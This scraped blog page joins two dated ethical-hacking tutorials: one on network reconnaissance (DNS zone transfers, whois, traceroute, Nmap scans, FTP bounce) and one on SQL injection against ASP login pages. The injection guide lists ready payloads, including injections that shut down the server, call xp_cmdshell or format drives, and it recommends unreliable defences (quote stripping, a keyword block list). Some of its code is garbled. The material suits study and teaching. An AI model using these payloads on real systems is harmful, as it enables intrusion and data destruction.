The first two lines of output say which DNS servers are being queried. In this case, it's dnsr1.sbcglobal.net in Texas. The non-authoritative answer lists two IP addresses for the Google web servers. Responses from non-authoritative servers do not contain copies of any domains. They have a cache file that is constructed from all the DNS lookups it has performed in the past for which it has gotten an authoritative response.
Nslookup can also be used in an interactive mode by just typing nslookup at the command prompt. In interactive mode, the user will be given a prompt of >; at which point, the user can enter a variety of options, including attempts to perform a zone transfer.
DNS normally moves information from one DNS server to another through the DNS zone transfer process. If a domain contains more than one name server, only one of these servers will be the primary. Any other servers in the domain will be secondary servers. Zone transfers are much like the DHCP process in that each is a four-step process. DNS zone transfers function as follows:

1. The secondary name server starts the process by requesting the SOA record from the primary name server.

2. The primary then checks the list of authorized servers, and if the secondary server's name is on that list, the SOA record is sent

3. The secondary must then check the SOA record to see if there is a match against the SOA it already maintains.

If the SOA is a match, the process stops here; however, if the SOA has a serial number that is higher, the secondary will need an update. The serial number indicates if changes were made since the last time the secondary server synchronized with the primary server. If an update is required, the secondary name server will send an All Zone Transfer (AXFR) request to the primary server.

4. Upon receipt of the AXFR, the primary server will send the entire zone file to the secondary name server.

A zone transfer is unlike a normal lookup in that the user is attempting to retrieve a copy of the entire zone file for a domain from a DNS server. This can provide a hacker or pen tester with a wealth of information. This is not something that the target organization should be allowing. Unlike lookups that primarily occur on UDP 53, unless the response is greater than 512 bytes, zone transfers use TCP 53. To attempt a zone transfer, you must be connected to a DNS server that is the authoritative server for that zone. Remember the nslookup information we previously gathered? It's shown here again for your convenience.

Registrant:
Pearson Technology Centre
Kenneth Simmons
200 Old Tappan Rd .
Old Tappan, NJ 07675 USA
Email: billing@superlibrary.comThis e-mail address is being protected from spambots. You need JavaScript enabled to view it
Phone: 001-201-7846187
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
DNS Servers:
usrxdns1.pearsontc.com
oldtxdns2.pearsontc.com


Review the last two entries. Both usrxdns1.pearsontc.com and oldtxdns2.pearsontc.com are the DNS authoritative servers for ExamCram.com. These are the addresses that an attacker will target to attempt a zone transfer. The steps to try and force a zone transfer are shown here:

1. nslookupEnter nslookup from the command line

2. server Enter the IP address of the authoritative server for that zone.

3. set type = anyTells nslookup to query for any record.

4. ls d Domain.com is the name of the targeted domain of the final step that performs the zone transfer.

One of two things will happen at this point; either you will receive an error message indicating that the transfer was unsuccessful, or you will be returned a wealth of information, as shown in the following:

C:\WINNT\system32>nslookup
Default Server: dnsr1.sbcglobal.net
Address: 128.112.3.12

server 172.6.1.114
set type=any
ls -d example.com

example.com. SOA hostmaster.sbc.net (950849 21600 3600 1728000 3600)
example.com. NS auth100.ns.sbc.net
example.com. NS auth110.ns.sbc.net
example.com. A 10.14.229.23
example.com. MX 10 dallassmtpr1.example.com
example.com. MX 20 dallassmtpr2.example.com
example.com. MX 30 lasmtpr1.example.com
lasmtpr1 A 192.172.243.240
dallassmtpr1 A 192.172.163.9
dallaslink2 A 192.172.161.4
spamassassin A 192.172.170.49
dallassmtpr2 A 192.172.163.7
dallasextra A 192.172.170.17
dallasgate A 192.172.163.22
lalink A 172.16.208.249
dallassmtp1 A 192.172.170.49
nygate A 192.172.3.250
www A 10.49.229.203
dallassmtp MX 10 dallassmtpr1.example.com
dallassmtp MX 20 dallassmtpr2.example.com
dallassmtp MX 30 lasmtpr1.example.com

Dig is another tool that can be used to provide this type of information. It's available for Linux and for Windows. Dig is a powerful tool that can be used to investigate the DNS system.
This type of information should not be made available to just anyone. Hackers can use this to find out what other servers are running on the network, and it can help them map the network and formulate what types of attacks to launch. Notice the first line that has example.com listed previously. Observe the final value of 3600 on that line. That is the TTL value discussed previously which would inform a hacker as to how long DNS poisoning would last. 3,600 seconds is 60 minutes. Zone transfers are intended for use by secondary DNS servers to synchronize with their primary DNS server. You should make sure that only specific IP addresses are allowed to request zone transfers. Although most Operating Systems restrict this by default, Windows 2000 did not. So, be aware of this if any 2000 servers are still in your network. All DNS servers should be tested. It is very often the case in which the primary has tight security, but the secondaries will allow zone transfers

[Google Hacking]

Most of us use Google or another search engine to locate information. What you might not know is that search engines, such as Google, have the capability to perform much more powerful searches than most people ever dream of. Not only can Google translate documents, perform news searches, do image searches, but it can also be used by hackers and attackers to do something that has been termed Google hacking. By using basic search techniques combined with advanced operators, Google can become a powerful vulnerability search tool.
Google can be used to uncover many pieces of sensitive information that shouldn't be revealed. To learn more about Google hacking, take a look at

http://johnny.ihackstuff.com

[Network Range]

Now that the pen test team has been able to locate name, phone numbers, addresses, some server names, and IP addresses, it's important to find out what range of IP addresses are available for scanning and further enumeration. If you take the IP address of a web server discovered earlier and enter it into the Whois lookup at www.arin.net, the network's range can be determined. As an example, 192.17.170.17 was entered into the ARIN Whois, and the following information was received:

OrgName: target network
OrgID: Target-2
Address: 1313 Mockingbird Road
City: Anytown
StateProv: Tx
PostalCode: 72341
Country: US
ReferralServer: rwhois://rwhois.exodus.net:4321/
NetRange: 192.17.12.0 - 192.17.12.255
CIDR: 192.17.0.0/24
NetName: SAVVIS
NetHandle: NET-192-17-12-0-1
Parent: NET-192-0-0-0-0

This means that the target network has 254 total addresses. The attacker can now focus his efforts on the range from 192.17.12.1 to 192.17.12.254 /24. If these results don't prove satisfactory, traceroute can be used for additional mapping.


[Traceroute]

The traceroute utility is used to determine the path to a target computer. Just as with nslookup, traceroute is available on Windows and UNIX platforms. In Windows, it is known as tracert because of 8.3 legacy filename constraints remaining from DOS. Traceroute was originally developed by Van Jacobson to view the path a packet follows from its source to its destination. Traceroute owes its functionality to the IP header time-to-live (TTL) field. You might remember from the discussion in Chapter 2, "The Technical Foundations of Hacking," that the TTL field is used to limit IP datagram's. Without a TTL, some IP datagram's might travel the Internet forever as there would be no means of timeout. TTL functions as a decrementing counter. Each hop that a datagram passes through reduces the TTL field by one. If the TTL value reaches 0, the datagram is discarded and a time exceeded in transit Internet Control Message Protocol (ICMP) message is created to inform the source of the failure. Linux tracer-oute is based on UDP, whereas Windows uses ICMP. To get a better idea of how this works, let's take a look at how Windows would process a tracer-oute. For this example, say that the target is three hops away. Windows would send out a packet with a TTL of 1. Upon reaching the first router, the packet TTL value would be decremented to 0, which would illicit a time exceeded in transit error message. This message would be sent back to the sender to indicate that the packet did not reach the remote host. Receipt of the message would inform Windows that it had yet to reach its destination, and the IP of the device in which the datagram timed out would be displayed. Next, Windows would increase the TTL to a value of 2. This datagram would make it through the first router, where the TTL value would be decremented to 1. Then it would make it through the second router; at which time, the TTL value would be decremented to 0 and the packet would expire. Therefore, the second router would create a time exceeded in transit error message and forward it to the original source. The IP address of this device would next be displayed on the user's computer. Finally, the TTL would be increased to 3. This datagram would easily make it past the first and second hop and arrive at the third hop. Because the third hop is the last hop before the target, the router would forward the packet to the destination and the target would issue a normal ICMP ping response. The output of this traceroute can be seen here:

C:\>tracert 192.168.1.200
Tracing route to 192.168.1.200:
1 10 ms <10 ms <10 ms
2 10 ms 10 ms 20 ms
3 20 ms 20 ms 20 ms 192.168.1.200
Trace complete.

Linux-based versions of traceroute work much the same way but use UDP. Traceroute sends these UDP packets targeted to high order port numbers that nothing should be listening on. Just as described previously, the TTL is increased until the target device is reached. Because traceroute is using a high order UDP port, typically 33434, the host should ignore the packets after generating port unreachable messages. These ICMP port unreachable messages are used by traceroute to notify the source that the destination has been reached.
It's advisable to check out more than one version of traceroute if you don't get the required results. Some techniques can also be used to try and slip traceroute passed a firewall or filtering device.
When UDP and ICMP are not allowed on the remote gateway, TCPTraceroute can be used. Another unique technique was developed by Michael Schiffman, who created a patch called traceroute.diff that allows you to specify the port that traceroute will use. With this handy tool, you could easily direct traceroute to use UDP port 53. Because that port is used for DNS queries, there's a good chance that it could be used to slip past the firewall.


[Identifying Active Machines]

Attackers will want to know if machines are alive before they attempt to attack. One of the most basic methods of identifying active machines is to perform a ping sweep. Although ping is found on just about every system running TCP/IP, it has been restricted by many organizations.
Ping uses ICMP and works by sending an echo request to a system and waiting for the target to send an echo reply back. If the target device is unreachable, a request time out is returned. Ping is a useful tool to identify active machines and to measure the speed at which packets are moved from one host to another or to get details like the TTL.

Ping does have a couple of drawbacks: First, only one system at a time is pinged and second, not all networks allow ping. To ping a large amount of hosts, a ping sweep is usually performed. Programs that perform ping sweeps typically sweep through a range of devices to determine which ones are active. Some of the programs that will perform ping sweeps include

- Angry IP Scanner
- Pinger
- WS_Ping_ProPack
- Network scan tools
- Super Scan
- Nmap

[Port Scanning]

Port scanning is the process of connecting to TCP and UDP ports for the purpose of finding what services and applications are running on the target device. After running applications, open ports and services are discovered, the hacker can then determine the best way to attack the system.
A good attacker takes time to build an attack plan and also phases his attack so that he is undetected. The primary step in mapping a target network will be to find the limits of the network and assess the perimeter defenses.
The attacker will seek to means of entry by building an inventory of the target network. This will give him an indication regarding any vulnerability that can be exploited and how well the network perimeters are guarded. An attacker might intrude with minimal footprint and lie low to assess what measures are being taken by the target network to detect the intrusion and defend it.


Common Ports and Protocols
Port Service Protocol
20/21 FTP TCP
22 SSH TCP
23 Telnet TCP
25 SMTP TCP
53 DNS TCP/UDP
69 TFTP UDP
80 HTTP TCP
110 POP3 TCP
135 RPC TCP
161/162 SNMP UDP
1433/1434 MSSQL TCP

As you have probably noticed, some of these applications run on TCP, whereas others run on UDP. Although it is certainly possible to scan for all 65,535 TCP and 65,535 UDP ports, many hackers will not. They will concentrate on the first 1,024 ports. These well-known ports are where we find most of the commonly used applications.
A list of well-known ports can be found at www.iana.org/assignments/port-numbers. Now, this is not to say that high order ports should be totally ignored because hackers might break into a system and open a high order port, such as 31337, to use as a backdoor. So, is one protocol easier to scan for than the other?
Well, the answer to that question is yes. TCP offers more opportunity for the hacker to manipulate than UDP. Let's take a look at why. TCP offers robust communication and is considered a connection protocol. TCP establishes a connection by using what is called a 3-way handshake. Those three steps proceed as follows:

The client sends the server a TCP packet with the sequence number flag (SYN Flag) set and an Initial Sequence Number (ISN).
The server replies by sending a packet with the SYN/ACK flag set to the client. The synchronize sequence number flag informs the client that it would like to communicate with it, whereas the acknowledgement flag informs the client that it received its initial packet. The acknowledgement number will be one digit higher than the client's ISN. The server will generate an ISN as well to keep track of every byte sent to the client. When the client receives the server's packet, it creates an ACK packet to acknowledge that the data has been received from the server. At this point, communication can begin.


[TCP Flag Types]

Flag Purpose

SYN Synchronize and Initial Sequence Number (ISN)
ACK Acknowledgement of packets received
FIN Final data flag used during the 4-step shutdown of a session
RST Reset bit used to close an abnormal connection
PSH Push data bit used to signal that data in the packet should be pushed to the beginning of the queue. Usually indicates an urgent message.
URG Urgent data bit used to signify that urgent control characters are present in this packet that should have priority.

At the conclusion of communication, TCP terminates the session by using a 4-step shutdown. Those four steps proceed as follows:

1. The client sends the server a packet with the FIN/ACK flags set.
2. The server sends a packet ACK flag set to acknowledge the clients packet.
3. The server then generates another packet with the FIN/ACK flags set to inform the client that it also is ready to conclude the session.
4. The client sends the server a packet with the ACK flag set to conclude the session.

The TCP system of communication makes for robust communication but also allows a hacker many ways to craft packets in an attempt to coax a server to respond or to try and avoid detection of an intrusion detection system (IDS). Many of these methods are built into Nmap and other port scanning tools, but before taking a look at those tools, some of the more popular port scanning techniques are listed here:

- TCP Connect scan This type of scan is the most reliable, although it is also the most detectable. It is easily logged and detected because a full connection is established. Open ports reply with a SYN/ACK, whereas closed ports respond with an RST/ACK.

- TCP SYN scan This type of scan is known as half open because a full TCP three-way connection is not established. This type of scan was originally developed to be stealthy and evade IDS systems although most now detect it. Open ports reply with a SYN/ACK, whereas closed ports respond with a RST/ACK.

- TCP FIN scan Forget trying to set up a connection; this technique jumps straight to the shutdown. This type of scan sends a FIN packet to the target port. Closed ports should send back an RST. This technique is usually effective only on UNIX devices.

- TCP NULL scan Sure, there should be some type of flag in the packet, but a NULL scan sends a packet with no flags set. If the OS has implemented TCP per RFC 793, closed ports will return an RST.

- TCP ACK scan This scan attempts to determine access control list (ACL) rule sets or identify if stateless inspection is being used. If an ICMP destination unreachable, communication administrative prohibited message is returned, the port is considered to be filtered.

- TCP XMAS scan Sorry, there are no Christmas presents here, just a port scan that has toggled on the FIN, URG, and PSH flags. Closed ports should return an RST.

Now let's look at UDP scans. UDP is unlike TCP. Although TCP is built on robust connections, UDP is based on speed. With TCP, the hacker has the ability to manipulate flags in an attempt to generate a TCP response or an error message from ICMP. UDP does not have flags, nor does UDP issue responses. It's a fire and forget protocol! The most you can hope for is a response from ICMP.
If the port is closed, ICMP will attempt to send an ICMP type 3 code 3 port unreachable message to the source of the UDP scan. But, if the network is blocking ICMP, no error message will be returned. Therefore, the response to the scans might simply be no response. If you are planning on doing UDP scans, plan for unreliable results.


[Nmap]


Nmap was developed by a hacker named Fyodor Yarochkin. This popular application is available for Windows and Linux as a GUI and command-line program. It is probably the most widely used port scanner ever developed. It can do many types of scans and OS identification. It also allows you to control the speed of the scan from slow to insane. Its popularity can be seen by the fact that it's incorporated into other products and was even used in the movie The Matrix. Nmap with the help option is shown here so that you can review some of its many switches. Nmap's documentation can be found at www.insecure.org

C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service and app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
--win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'

SEE THE MAN PAGE FOR MANY MORE OPTIONS. - http://insecure.org/nmap/man/


As can be seen from the output of the help menu in the previous listing, Nmap can run many types of scans. Nmap is considered a required tool for all ethical hackers. Nmap's output provides the open port's well-known service name, number, and protocol. They can either be open, closed, or filtered. If a port is open, it means that the target device will accept connections on that port. A closed port is not listening for connections, and a filtered port means that a firewall, filter, or other network device is guarding the port and preventing Nmap from fully probing it or determining its status. If a port is reported as unfiltered, it means that the port is closed and no firewall or router appears to be interfering with Nmap's attempts to determine its status. To run Nmap from the command line, type Nmap, followed by the switch, and then enter a single IP address or a range. For the example shown here, the sT option was used, which performs a TCP full 3-step connection.

C:\nmap-3.93>nmap -sT 192.168.1.108
Starting nmap 3.93 (http://www.insecure.org/nmap) at 2005-10-05 23:42 Central
Daylight Time
Interesting ports on Server (192.168.1.108):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
515/tcp open printer
548/tcp open afpovertcp
Nmap run completed -- 1 IP address (1 host up) scanned in 420.475 seconds

Several interesting ports were found on this computer, including 80 and 139. A UDP scan performed with the -sU switch returned the following results:

C:\nmap-3.93>nmap -sU 192.168.1.108
Starting nmap 3.93 (http://www.insecure.org/nmap) at 2005-10-05 23:47 Central
Daylight Time
Interesting ports on Server (192.168.1.108):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
69/udp open tftp
139/udp open netbios-ssn
Nmap run completed -- 1 IP address (1 host up) scanned in 843.713 seconds

Nmap also has a GUI version called NmapFE. Most of the options in NmapFe correspond directly to the command-line version. Some people call NmapFe the Nmap tutor because it displays the command-line syntax at the bottom of the GUI interface. It is no longer updated for Windows but is maintained for the Linux platform.


[FTP bounce]


A creative scan first detailed by 'Hobbit', takes advantage of the FTP servers with read/write access. The advantage of this scan can be both anonymity and accessibility. For instance suppose the target network allows FTP data transfer from only its recognized partners.
An attacker might discover a service business partner who has a FTP service running with a world-writeable directory that any anonymous user can drop files into and read them back from. It could even be the ISP hosting services on its FTP server.
The attacker, who has a FTP server and able to run in passive mode, logs in anonymously to the legitimate server and issues instructions for scanning or accessing the target server through a series of FTP commands. He may choose to make this into a batch file and execute it from the legitimate server to avoid detection.
If a connection is established as a means of active data transfer processing (DTP), the client knows a port is open, with a 150 and 226 response issued by the server. If the transfer fails a 425 error will be generated with a refused build data message. The PASV listener connection can be opened on any machine that grants a file write access to the attacker and used to bounce the scan attack for anonymity. Hobbit points out that "it does not even have to be an FTP server -- any utility that will listen on a known TCP port and read raw data from it into a file will do".


Often these scans are executed as batch files padded with junk so that the TCP windows are full and the connection stays alive long enough for the attacker to execute his commands. Fingerprinting the OS can help determine the TCP window size and allow the attacker to pad his commands for further access accordingly. Fingerprinting is discussed in detail later in this module. This scan is hard to trace, permits access to local networks and evades firewalls. However, most FTP servers have patched this vulnerability by adopting countermeasures such as preventing third party connections and disallowing listing of restricted ports. Another measure adopted has been to restrict write access.

[UDP Scan]


We have seen how private ports are assigned at the higher end and UDP scans try to detect the state of the port by transmitting a zero byte UDP packet to the target system and the concerned port. An open port does not respond, while a closed port will reply with an ICMP HOST UNREACHABLE response. Similar to inverse mapping, the absence of evidence is considered as the evidence of presence. The disadvantage to the attacker is that UDP is a connectionless protocol and unlike TCP does not retransmit packets if they are lost or dropped on the network. Moreover, it is easily detected and unreliable (false positives). Linux kernels limit ICMP error message rates, with destination unreachable set to 80 per 4 seconds, thereafter implementing a 1/4 second penalty if the count is exceeded. This makes the scan slow and moreover the scan requires root access. However, it avoids TCP based IDS and can scan non-TCP ports.

Sumber : http://www.hackerscenter.com

Read More..

Sql injection - HSC Guides - Web App Security

Written by Ethical Hacker
Sunday, 17 February 2008 17:06

SQL Injection is an attack method that targets the data residing in a database through the firewall that shields it. It attempts to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database.
Naturally, the first step in this direction should be to uncover web applications that are vulnerable to the attack. The attack takes advantage of poor code and website administration. In SQL injection, user controlled data is placed into a SQL query without being validated for correct format or embedded escape strings. It has been known to affect majority of applications which use a database backend and do not filter variable types. It has been estimated that at least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable to this attack. The dominant cause is the improper validation in CFML, ASP, JSP, and PHP codes. Attackers go about uncovering the susceptible web application by looking at web pages for anything resembling an ID number, category, or name. The attacker may sift through all forms of variables as well as cookies. Many a times session cookies are stored in a database and these cookies are passed into SQL queries with little or no format checks. They may try placing various strings into form fields and in query variables. However, typically, someone looking for SQL vulnerability will start off with single and double quotes and then try with parenthesis and the rest of the punctuation characters. The response expected is any response signifying an error.
(OLE DB Errors)

The user filled fields are enclosed by single quotation marks ('). So a simple test of the form would be to try using (') as the username.
When we just enter in a form that is vulnerable to SQL insertion. If you get OLE Database error, then you can try SQL injections.


[example]

Attackers start by using the single quote in the User ID field of the login page. It returned an error just as they wanted it.


[Error Type]


Microsoft OLE DB Provider for ODBC Drivers (Ox80040E14)

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Unclosed quotation mark before the character string '''.

/corner/asp/checklogin1.asp, line 7

Browser Type:

Mozilla/(version) (compatible; MSIE 6.0; Windows NT 5.0)

Page: #

POST 36 bytes to /corner/asp/checkloginl.asp

POST Data:

userid=%27&userpwd=%27&Submit=Submit


This output is the first lead the attacker can use. He has a greater chance of succeeding if he can find out which database he is pitted against. This is called database footprinting. Database footprinting is the process of mapping out the tables on the database. Identifying the configuration of the server is crucial in deciding how the site will be attacked. The method chosen to do this will depend on how poorly the server has been configured. In the error statement shown above, it is clear that the site is using a SQL Server. Note that SQL Injection is the attack on the web application, not the web server or services running in the OS. It is typical of an HTML page to use the POST command to send parameters to another ASP page. On a closer look at the source code we find the "FORM" tag,

Let us look at the implications.

Exploits occur due to coding errors and inadequate validation checks as well. Often, the emphasis is on acquiring an input and delivering a suitable output. Web applications that do not check the validity of its input, are exposed to the attack.

Another attack type is Login script. The login page at site.com/login.htm is based on this code.


Username:

Password:

< /form>

The above form points to checklogin.asp where we come across the following code.


Dim p_struser, p_strpass, objRS, strSQL
p_struser = Request.Form ("user_name")
p_strpass = Request. Form ("pwdpass")
strSQL = "SELECT * FROM tblUsers " & _
"WHERE user_name='" & p_strusr & _
'"and pwdpass='" & p_strpass & ""'
Set objRS = Server. CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."

If (objRS.EOF) Then
Response. Write "Invalid login."
Else
Response. Write "You are logged in as" & objRS("user_name")
End If

Set objRS = Nothing




At a cursory glance this code looks alright and does what it is supposed to do - check for a valid username and password and allow the user to access the site if it the credentials are valid.

However, note the above statement where the user input from the form is directly used to build a SQL statement. There is no input validation regarding the nature of input. It gives direct control to an attacker who wants to access the database.

For instance if the attacker enters a SELECT statement such as SELECT * FROM tblUsers WHERE user_name=" or "=" and pwdpass = " or "=", the query will be executed and all the users from the queried table will be displayed as output. Moreover, the first attacker will be logged in as the first user identified by the first record in the table. It is quite probable that the first user is the superuser or the administrator. Since the form does not check for special characters such as "=", the attacker is able to use these to achieve his malicious intent. For clarity sake, let us look at a secure code. Note the use of the REPLACE function to take care of the single quote input.


< % Else
strSQL = "SELECT * FROM tblUsers " _ &
"WHERE username="' & Replace (Request. Form ("usr_name"), ""', """) &'" " _ &
"AND password="'" & Replace (Request. Form("pwdpass"),'"", """) &'";"
Set Login = Server. CreateObject ("ADODB.Connection")
Login. Open ("DRIVER= {Microsoft Access Driver (*.mdb)};" _ &
"DBQ=" & Server.MapPath ("login.mdb"))
Set rstLogin = Login. Execute (strSQL)
If Not rstLogin.EOF then
%>

SQL Server, among other databases, delimits queries with a semi-colon. The use of a semicolon allows multiple queries to be submitted as one batch and executed sequentially. For example, the query Username: 'or 1=1; drop table users; -- will be executed in two parts. Firstly, it would select the username field for all rows in the users table. Secondly, it would delete the users table.

Login Guessing & Insertion is anoterh way of trying to Hack. The attacker can try to login without a password. Typical usernames would be 1=1 or any text within single quotes. The most common problem seen on Microsoft MS - SQL boxes is the default sa password.
The attacker can try to guess the username of an account by querying for similar user names (ex: ad%' is used to query for "admin").
The attacker can insert data by appending commands or writing queries.

From database fingerprinting, if the attacker has determined that the database backend is SQL server, he will try his luck with the default admin login credentials - namely sa and a blank password. Alternatively he can issue a query so that his query would retrieve a valid username. For instance, to retrieve the administrative account, he can query for users.userName like 'ad%' --

Now if the attacker does not want to login and just wants to 'harvest' the site, he may try to view extra information which is not otherwise available. He can choose to transform the url such as the ones shown below to retrieve information.

http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools

Here, the "sCategory" is the variable name, and "Tools" is the value assigned to the variable. The attacker changes this valid url into:

http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Kits

If the code underlying the page has a segment similar to the one shown below:

sub_cat = request ("sCategory")
sqlstr="SELECT * FROM product WHERE Category='" & sub_cat &'""
Set rs=conn.execute (sqlstr)

Now, the value "Kits" taken in by the variable "sCategory" is attributed to sub_cat and hence the SQL statement becomes:

SELECT * FROM product WHERE Category='Kits'

Therefore the output will be a result set containing rows that match the WHERE condition. If the attacker appends the following to the valid url,

http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools'or1=1—

The SQL statement becomes SELECT * FROM product WHERE Category='Tools' or 1=1 --'

This leads the query to select everything from the product table irrespective of whether Category equals "Tools' or not. The double dash " --" instructs the SQL Server to ignore the rest of the query. This is done to eliminate the last hanging single quote ('). Sometimes, it is possible to replace double dash with single hash "#".

If the database backend in question is not an SQL Server, it will not recognize the double dash. The attacker can then try appending ' or 'a'='a, which should return the same result.

Depending on the actual SQL query, the various possibilities available to the attacker are:

'or 1=1--

"or 1=1--

or1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a


To use the database for his malevolent intent, the attacker needs to figure out more than just what database is running at the backend. He will have to determine the database structure and tables. Revisiting our product table, we see that the attacker can insert commands such as: insert into Category value (library)

Suppose the attacker wants to add a description of the files he wants to upload, he will need to determine the structure of the table. He might be able to do just that, if error messages are returned from the application according to the default behaviour of ASP and decipher any value that can be read by the account the ASP application is using to connect to the SQL Server.

The insertion methods will vary according to the database at the backend. For instance, MS SQL is considered to be the easiest system for SQL Insertion. Oracle has no native command execution capability. In Sybase, the Command exec is disabled by default. However, it is similar to MS SQL - though without as many stored procedures. MySQL is very limited in scope. SubSelects are a possibility with newer versions. It is typically restricted to one SQL command per query. One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes it to shutdown, immediately stopping the Windows service.

Username: ' ; shutdown with nowait; -
- Password [Anything]

This can happen if the script runs the following query:

select userName from users where
userName='; shutdown with
nowait;-' and user_Pass=' '

The default installation of SQL Server has the system account (sa) which is accorded all the privileges of the administrator. An attacker who happens to stumble across this account while harvesting websites can take advantage of this and gain access to all commands, delete, rename, and add databases, tables, triggers, and more. One of the attacks he can carry out when he is done with the site is to issue a denial of service by shutting down the SQL Server. A powerful command recognized by SQL Server is SHUTDOWN WITH NOWAIT. This causes the server to shutdown, immediately stopping the Windows service. After this command has been issued, the service must be manually restarted by the administrator. Let us take a look at an example. At an input form such as login, which is susceptible to SQL injection, the attacker issues the following command.

Username: '; shutdown with nowait; --
Password: [Anything]

This would make our login.asp script run the following query:

select userName from users where userName=";
shutdown with nowait; --'and userPass="

The '--' character sequence is the 'single line comment' sequence in Transact -SQL, and the ';' character denotes the end of one query and the beginning of another. If he has used the default sa account, or has acquired the required privileges, SQL server will shut down, and will require a restart in order to function again.


Stored Porcedures

There are several extended stored procedures that can cause permanent damage to a system.

We can execute an extended stored procedure using our login form with an injected command as the username as follows:



Username: ' ; exec master..xp_xxx; --

Password: [Anything]

Username: ' ; exec master..xp_cmdshell ' iisreset' ; --

Password: [Anything]

A stored procedure is a collection of SQL statements that can be called as though they were a single function. A SQL stored procedure is similar to a batch file - both are text files consisting of commands, and can be run by invoking the name of the procedure or batch file. An extended stored procedure (XP) takes the notion of a stored procedure one step further. Where stored procedures consist of text files, XPs are written in high-languages like C and compiled into .DLLs. Stored procedures primarily consists of SQL commands, while XPs can provide entirely new functions via their code. An attacker can take advantage of extended stored procedure by entering a suitable command. This is possible if there is no proper input validation. xp_cmdshell is a built-in extended stored procedure that allows the execution of arbitrary command lines. For example: exec master..xp_cmdshell 'dir' will obtain a directory listing of the current working directory of the SQL Server process. In this example, the attacker may try entering the following input into a search form can be used for the attack.

' exec master..xp_cmdshell 'product handy cam/DELETE' --

When the query string is parsed and sent to SQL Server, the server will process the following code:

SELECT * FROM PTable WHERE input text =" exec master..xp_cmdshell ' product
handycam/DELETE' --'


The advantage of this attack method is that the DLL file only needs to be present on a machine accessible by the SQL Server. Here, the first single quote entered by the user closes the string and SQL Server executes the next SQL statements in the batch including a command to delete a product to the product table in the database.


Server Talks

This command uses the 'speech.voicetext' object, causing the SQL Server to speak:

admin'; declare @o int, @ret
int exec sp_oacreate
'speech.voicetext', @o,
'register', NULL,'foo',
'bar' exec sp_oasetproperty
@o, 'speed',150 exec
sp_oamethod @o, 'speak',
NULL, 'all your sequel
servers are belong to us',
528 waitfor delay '00:00:05'--


It is possible for an attacker to leverage built-in extended stored procedures which are provided for the creation of ActiveX Automation scripts in SQL server. These scripts are typically written in VBScript or JavaScript, and they create automation objects and interact with them. They are functionally similar to ASP scripts. Similarly an automation script written in Transact-SQL can accomplish what an ASP script or a WSH script will do.


[Eaxmaple 2]

declare @o int, @ret int

exec sp_oacreate 'speech.voicetext', @o out

exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'

exec sp_oasetproperty @o, 'speed', 150

exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers belong to us', 528

waitfor delay '00:00:05'

This uses the 'speech.voicetext' object, causing the SQL Server to speak.

Preventing Attacks


Minimize Privileges of Database Connection, Disable verbose error messages, Protect the system account 'sa', Audit Source Code, Escape Single Quotes, Allow only good input, Reject known bad input, Restrict length of input and finally update Database and back it up! The majority of injection attacks require the user of single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding. Using ASP, it's a simple matter of creating a generic replace function that will handle the single quotes automatically, like this:
function stripQuotes(strWords)

stripQuotes = replace (strWords, "'", """ ;)

end function


Now if you use the stripQuotes function in conjunction with our first query for example, then it would go from this:

select count(*) from users where userName='alice' and
userPass=" or 1=1 --'

...to this:

select count(*) from users where userName='alice' and
userPass="' or 1=1 --'

This, in effect, stops the injection attack from taking place, because the clause for the WHERE query now requires both the userName and userPass fields to be valid.

Some countermeasure would be to, Remove Culprit Characters/Character Sequences: Certain characters and character sequences such as; --, select, insert and xp_ can be used to perform an SQL injection attack. By removing these characters and character sequences from user input before we build a query, we can help reduce the chance of an injection attack even further. As with the single quote solution, we just need a basic function to handle this:

function killChars(strWords)
dim badChars
dim newChars
badChars = array("select", "drop",";","--", "insert",
" delete", "xp_")
newChars = strWords
for i = o to uBound(badChars)
newChars = replace(newChars, badChars(i),"")
next
killChars = newChars
end function

Using stripQuotes in combination with killChars greatly removes the chance of any SQL injection attack from succeeding. So if the query:

select prodName from products where id=1; xp_cmdshell 'format
c: /q /yes '; drop database targetDB; --

is run through stripQuotes and then killChars, it would end up looking like this:

prodName from products where id=1 cmdshell "format c:
/q /yes " database targetDB

This is basically useless, and will return no records from the query. By keeping all text boxes and form fields as short as possible, the number of characters that can be used to formulate an SQL injection attack is greatly reduced. Additional countermeasures include checking data type, and using the post method where possible to post forms.

Conclusion
SQL Injection is an attack methodology that targets the data residing in a database through the firewall that shields it.
